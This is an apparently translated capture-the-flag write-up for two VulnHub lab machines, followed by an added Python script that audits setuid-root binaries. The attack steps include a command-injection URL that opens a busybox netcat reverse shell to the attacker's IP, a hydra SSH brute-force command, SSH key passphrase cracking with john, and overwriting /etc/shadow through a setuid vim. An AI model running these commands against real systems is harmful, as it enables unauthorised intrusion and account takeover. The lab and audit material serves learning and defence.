Target machine pentesting (MinUv1, basic pentesting2)

MinUv1

Introduction

https://www.vulnhub.com/entry/minu-1,235/

IP and ports

Target IP: 192.168.1.102. Open ports:

Code execution

Went to port 80 and found Apache's default page. A dirb scan turned up nothing useful, so I switched directory scanners; dirsearch found test.php. The latest page looked like a file inclusion, but it turned out not to be file inclusion at all: it is arbitrary code execution. It apparently includes the source with something like system('cat xxx'). Many commands seem to fail, though. Someone shared a site with plenty of command tricks, worth passing along: https://gtfobins.github.io/ . Here busybox does the job:

http://192.168.1.102/test.php?file=index;busybox%20nc%20192.168.1.105%206712%20-e%20sh%20-i

Got a shell.

Privilege escalation

Checked /etc/passwd and found the user bob, then went into bob's home directory and looked around:

/home/bob $ cat ._pw_
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.pn55j1CFpcLjvReaqyJr0BPEMYUsBdoDxEPo6Ft9cwg

This is a JWT, so I cracked it with a tool; it ran for ages but eventually came out... However, the box does not seem to have Python, so su cannot be invoked... A new trick comes in here: script can be used to switch users.

basic pentesting2

Quite interesting, with a lot of different approaches.

Introduction

https://www.vulnhub.com/entry/basic-pentesting-2,241/

IP and ports

Target IP: 192.168.1.106. Open ports:

Getting a shell

On port 80 there is a comment in the page source:

<html>

<h1>Undergoing maintenance</h1>

<h4>Please check back later</h4>

<!-- Check our dev note section if you need to know what to work on. -->


</html>

A directory scan leads to /development, which holds two pieces of information. dev.txt:

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt:

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

Here I learned a new enumeration method, enum4linux, which enumerates the usernames. Port 22 is open as well, so try hydra:

hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 4 -f 192.168.1.106 ssh

Privilege escalation

Official solution

After logging in, there is another user, kay. In kay's home directory there is a .ssh folder, and authorized_keys ends with an extra line. Logging in with the private key failed because it asks for a passphrase, so crack the passphrase: copy the private key to id_rsa, run ssh2john, then crack it with john (I had already cracked it once, so I just used --show). Login succeeded, and kay's home directory holds a backed-up password:

kay@basic2:~$ cat pass.bak 
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Try sudo -l:

kay@basic2:~$ sudo -l
Matching Defaults entries for kay on basic2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
(ALL : ALL) ALL

So a plain sudo bash is enough.

Not sure whether this is the official solution.

SUID privilege escalation

jan@basic2:/home/kay/.ssh$ find / -perm -4000 -user root 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/vim.basic
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/passwd
/bin/su
/bin/ntfs-3g
/bin/ping6
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping

vim.basic is in the list: replace the password hash in /etc/shadow with it, then su root.
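From the defender's side, the listing above is exactly what a SUID audit should catch: a setuid-root editor such as vim.basic gives any local user write access to /etc/shadow. The following is an added example, not part of the original write-up; its baseline is constructed from the listing above with vim.basic removed, and its list of file-write-capable program names is a short, constructed subset of the GTFOBins SUID entries.

```python
"""Added example: flag setuid-root binaries that are unexpected or that can
write arbitrary files, using the find listing from the write-up as input."""
from os.path import basename

# Constructed baseline: the listing above minus vim.basic. On a real host,
# build this from a known-good golden image instead.
EXPECTED_SUID = {
    "/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/snapd/snap-confine",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/bin/pkexec", "/usr/bin/newgrp", "/usr/bin/chfn", "/usr/bin/sudo",
    "/usr/bin/chsh", "/usr/bin/newgidmap", "/usr/bin/gpasswd",
    "/usr/bin/newuidmap", "/usr/bin/passwd", "/bin/su", "/bin/ntfs-3g",
    "/bin/ping6", "/bin/umount", "/bin/fusermount", "/bin/mount", "/bin/ping",
}

# Constructed, deliberately incomplete set of program names that, when
# setuid root, allow arbitrary file read/write or spawn a shell.
FILE_WRITE_CAPABLE = {
    "vim", "vim.basic", "vim.tiny", "vi", "nano", "ed", "less", "more",
    "python", "python2", "python3", "perl", "ruby", "bash", "sh", "cp",
    "mv", "tee", "find",
}

def parse_find_output(text):
    """Keep only absolute paths; drops the shell prompt line and blanks."""
    return [ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")]

def audit_suid(paths, expected=EXPECTED_SUID, dangerous=FILE_WRITE_CAPABLE):
    """Return (unexpected, high_risk): paths missing from the baseline, and
    paths whose program name can write files even if they are baselined."""
    unexpected = sorted(p for p in paths if p not in expected)
    high_risk = sorted(p for p in paths if basename(p) in dangerous)
    return unexpected, high_risk

# Constructed sample: a shortened copy of the listing in the write-up above.
SAMPLE = """jan@basic2:/home/kay/.ssh$ find / -perm -4000 -user root 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/vim.basic
/usr/bin/pkexec
/usr/bin/passwd
/bin/su
/bin/mount
"""

if __name__ == "__main__":
    unexpected, high_risk = audit_suid(parse_find_output(SAMPLE))
    print("not in baseline:", unexpected)    # ['/usr/bin/vim.basic']
    print("file-write capable:", high_risk)  # ['/usr/bin/vim.basic']
```

Run it against the real output of find on a host and diff the baseline per image; either list being non-empty is worth a ticket.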

Detours

Looked at the manager page on 8080 and ran a round of msf password brute-forcing, with no result. Saw the struts 2.5.12 and REST note from port 80, and searchsploit found the vulnerability, but the attack did not succeed... Keep an open mind about approaches...

Follow-up

Looked at the tomcat directory, and there really is a struts2-rest directory... I just did not find it at the time... msf took it in one go... As for the manager module password, not being able to guess it is perfectly normal...